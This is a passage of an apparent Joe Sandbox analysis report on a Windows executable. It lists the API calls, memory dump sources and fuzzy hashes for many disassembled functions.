                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                    • String ID:
                                                                    • API String ID: 3225163088-0
                                                                    • Opcode ID: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                    • Instruction ID: 7074044fe9b12928a1bc6b6b7b8b528f3f1c4c1abae41bb1d70950263cfcc530
                                                                    • Opcode Fuzzy Hash: 66f41d18b10aece1586a59e42402bf78ab60308681f0b4e375490f4680313cbf
                                                                    • Instruction Fuzzy Hash: 9D911471904219AFCB14CFA9C884AEEBBB8FF49320F148459E655F7251D378A941DBA0
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0096396B
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00963A7A
                                                                    • _wcslen.LIBCMT ref: 00963A8A
                                                                    • VariantClear.OLEAUT32(?), ref: 00963C1F
                                                                      • Part of subcall function 00950CDF: VariantInit.OLEAUT32(00000000), ref: 00950D1F
                                                                      • Part of subcall function 00950CDF: VariantCopy.OLEAUT32(?,?), ref: 00950D28
                                                                      • Part of subcall function 00950CDF: VariantClear.OLEAUT32(?), ref: 00950D34
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4137639002-1221869570
                                                                    • Opcode ID: adbd951bfa4920b879acd73885626cd5e68744ac7bea068c5cf4c6d6f6839ede
                                                                    • Instruction ID: 9cf141939b5013cdc6dc8a2cff1dc0c3e341ed1465bb191356f4f74ee8dd6c99
                                                                    • Opcode Fuzzy Hash: adbd951bfa4920b879acd73885626cd5e68744ac7bea068c5cf4c6d6f6839ede
                                                                    • Instruction Fuzzy Hash: 1A9175756083459FC714EF68C48192AB7E8FF89714F14882EF88A9B351DB30EE45CB82
                                                                    APIs
                                                                      • Part of subcall function 0094000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
                                                                      • Part of subcall function 0094000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
                                                                      • Part of subcall function 0094000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
                                                                      • Part of subcall function 0094000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00964C51
                                                                    • _wcslen.LIBCMT ref: 00964D59
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00964DCF
                                                                    • CoTaskMemFree.OLE32(?), ref: 00964DDA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 614568839-2785691316
                                                                    • Opcode ID: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                    • Instruction ID: 4d9268a45281d0847e33837475b27b16341c4b8af4162a56bee6e92d83a6f08f
                                                                    • Opcode Fuzzy Hash: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
                                                                    • Instruction Fuzzy Hash: 90912771D0021DAFDF15DFA4C891AEEB7B8FF48300F108169E919A7291DB34AA44CFA1
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00972183
                                                                    • GetMenuItemCount.USER32(00000000), ref: 009721B5
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009721DD
                                                                    • _wcslen.LIBCMT ref: 00972213
                                                                    • GetMenuItemID.USER32(?,?), ref: 0097224D
                                                                    • GetSubMenu.USER32(?,?), ref: 0097225B
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009722E3
                                                                      • Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 4196846111-0
                                                                    • Opcode ID: fc6ea280fbfc575acbaea950734ecdb28c22707ef407cff590a2664c8d94e437
                                                                    • Instruction ID: 7814c9e585fc573b7beba8976516535b18f9f0ae3fdca31a7951d4b2666367a2
                                                                    • Opcode Fuzzy Hash: fc6ea280fbfc575acbaea950734ecdb28c22707ef407cff590a2664c8d94e437
                                                                    • Instruction Fuzzy Hash: CD71A276E14205AFCB14DF68C881AAEB7F5FF88310F148459E92AEB351DB34ED418B90
                                                                    APIs
                                                                    • IsWindow.USER32(00BB55B8), ref: 00977F37
                                                                    • IsWindowEnabled.USER32(00BB55B8), ref: 00977F43
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097801E
                                                                    • SendMessageW.USER32(00BB55B8,000000B0,?,?), ref: 00978051
                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00978089
                                                                    • GetWindowLongW.USER32(00BB55B8,000000EC), ref: 009780AB
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009780C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                    • String ID:
                                                                    • API String ID: 4072528602-0
                                                                    • Opcode ID: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                    • Instruction ID: 725a997a32b67e8eba5c6a776d15e4570c20916da2997f64ac42afb71c1df1ce
                                                                    • Opcode Fuzzy Hash: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
                                                                    • Instruction Fuzzy Hash: 6F71A076608244AFEB219FA4C994FFABBB9EF49300F148859F94D97261CB31A844DB10
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 0094AEF9
                                                                    • GetKeyboardState.USER32(?), ref: 0094AF0E
                                                                    • SetKeyboardState.USER32(?), ref: 0094AF6F
                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0094AF9D
                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0094AFBC
                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0094AFFD
                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0094B020
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                    • Instruction ID: d07757cfeac22b0fc811e3cf66b86791d9fbde389e40de3eb3ce23e454b74637
                                                                    • Opcode Fuzzy Hash: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
                                                                    • Instruction Fuzzy Hash: 7F51CDA1A487D53DFB3682348C45FBBBEAD5B06304F088989E1E9958C2D3D8EDC8D751
                                                                    APIs
                                                                    • GetParent.USER32(00000000), ref: 0094AD19
                                                                    • GetKeyboardState.USER32(?), ref: 0094AD2E
                                                                    • SetKeyboardState.USER32(?), ref: 0094AD8F
                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0094ADBB
                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0094ADD8
                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0094AE17
                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0094AE38
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                    • Instruction ID: d024219403177082123ff83c33a2d030644adfa65a41f6c20de630db985a2b86
                                                                    • Opcode Fuzzy Hash: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
                                                                    • Instruction Fuzzy Hash: 8251D5A19887D53DFB3683348C95F7B7EAC5B46304F088588E1E9468C2D294ED88E752
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(00923CD6,?,?,?,?,?,?,?,?,00915BA3,?,?,00923CD6,?,?), ref: 00915470
                                                                    • __fassign.LIBCMT ref: 009154EB
                                                                    • __fassign.LIBCMT ref: 00915506
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00923CD6,00000005,00000000,00000000), ref: 0091552C
                                                                    • WriteFile.KERNEL32(?,00923CD6,00000000,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 0091554B
                                                                    • WriteFile.KERNEL32(?,?,00000001,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 00915584
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                    • Instruction ID: 805dbcdf876b633db3ea388f9044658cea219ca05e38425cfa1d15268a919754
                                                                    • Opcode Fuzzy Hash: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
                                                                    • Instruction Fuzzy Hash: 9E51E5B1B00609DFDB10CFA8D845AEEBBFAEF49300F16451AF555E7291D7309A81CB60
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902D4B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00902D53
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902DE1
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00902E0C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00902E61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                    • Instruction ID: 5771cdf44958b204bb4f42d5e2f491460c38b705d42ca641f3daa6f06187eee3
                                                                    • Opcode Fuzzy Hash: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
                                                                    • Instruction Fuzzy Hash: 4E418E34A00219EFCF10DF68C859A9EBBB9BF85324F148195E814AB3D2D775AE15CBD0
                                                                    APIs
                                                                      • Part of subcall function 0096304E: inet_addr.WSOCK32(?), ref: 0096307A
                                                                      • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00961112
                                                                    • WSAGetLastError.WSOCK32 ref: 00961121
                                                                    • WSAGetLastError.WSOCK32 ref: 009611C9
                                                                    • closesocket.WSOCK32(00000000), ref: 009611F9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 2675159561-0
                                                                    • Opcode ID: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                    • Instruction ID: a7b066bd64e21b7f1122ae5f88aac9d7257a4325b4da019b67993f67f5870a32
                                                                    • Opcode Fuzzy Hash: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
                                                                    • Instruction Fuzzy Hash: 2C41F672604204AFDB109F14C885BAAB7E9FF46364F198059FD19DB291CB74ED81CBE1
                                                                    APIs
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD
                                                                      • Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0094CF45
                                                                    • MoveFileW.KERNEL32(?,?), ref: 0094CF7F
                                                                    • _wcslen.LIBCMT ref: 0094D005
                                                                    • _wcslen.LIBCMT ref: 0094D01B
                                                                    • SHFileOperationW.SHELL32(?), ref: 0094D061
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                    • String ID: \*.*
                                                                    • API String ID: 3164238972-1173974218
                                                                    • Opcode ID: 39bb66a05626741b844fa6b2025af918f894e4c4fc1da8768f90ad8fc9d6aee5
                                                                    • Instruction ID: 9c398c78981813a57f42eba183ad320be532aeb42ac62ba7c53fe37a7faaf1fa
                                                                    • Opcode Fuzzy Hash: 39bb66a05626741b844fa6b2025af918f894e4c4fc1da8768f90ad8fc9d6aee5
                                                                    • Instruction Fuzzy Hash: 484156B59462189FDF12EBA4C981FDEB7BCAF48380F1000E6E505EB141EB35A688CB50
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00972E1C
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E4F
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972E84
                                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00972EB6
                                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00972EE0
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00972EF1
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00972F0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                    • Instruction ID: 54898307ef22e19d92aa02da98af61a2e3f0b04fcb5eb489d9dc67812c153cec
                                                                    • Opcode Fuzzy Hash: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
                                                                    • Instruction Fuzzy Hash: 69311532628141DFDB20CF58ED94F6937E4EF8A720F154168F9488F2B1CB71A880EB41
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947769
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094778F
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00947792
                                                                    • SysAllocString.OLEAUT32(?), ref: 009477B0
                                                                    • SysFreeString.OLEAUT32(?), ref: 009477B9
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009477DE
                                                                    • SysAllocString.OLEAUT32(?), ref: 009477EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: 65621a099be2c9b4a4802340223d1fd46ee3857907b25810ec9ff4aa68815a6b
                                                                    • Instruction ID: 86584bfb04b83875d53a37d7d5e082062876016e41d4c674b4ecf7fd5403304b
                                                                    • Opcode Fuzzy Hash: 65621a099be2c9b4a4802340223d1fd46ee3857907b25810ec9ff4aa68815a6b
                                                                    • Instruction Fuzzy Hash: 6421B07660821DAFDB10DFA8CC88CBBB7ACEF093647408429FA19DB161D770DC8187A0
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947842
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947868
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0094786B
                                                                    • SysAllocString.OLEAUT32 ref: 0094788C
                                                                    • SysFreeString.OLEAUT32 ref: 00947895
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 009478AF
                                                                    • SysAllocString.OLEAUT32(?), ref: 009478BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: c948ea008731ac6649e6a9f7848e3b238876c265551688a5db375af20ae16e36
                                                                    • Instruction ID: 89e0f5dd3ad16cb584b5d7d43b807a3678449392ecc50f09806a2da169662aa4
                                                                    • Opcode Fuzzy Hash: c948ea008731ac6649e6a9f7848e3b238876c265551688a5db375af20ae16e36
                                                                    • Instruction Fuzzy Hash: D5213E76608208AF9B109BE8DC88DAAB7ACEB097607108525BA15DB2A1D774DC81DB64
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 009504F2
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0095052E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandlePipe
                                                                    • String ID: nul
                                                                    • API String ID: 1424370930-2873401336
                                                                    • Opcode ID: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                    • Instruction ID: fa546b65b27ca7f59ec072c28b610b64ad5dc8cd98f058e25c0fe293b777f1c5
                                                                    • Opcode Fuzzy Hash: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
                                                                    • Instruction Fuzzy Hash: 85217E71500305EBDB20CF2BD804A9A77A8BF84725F204A19FCA1E62E0E770D949DF20
                                                                    APIs
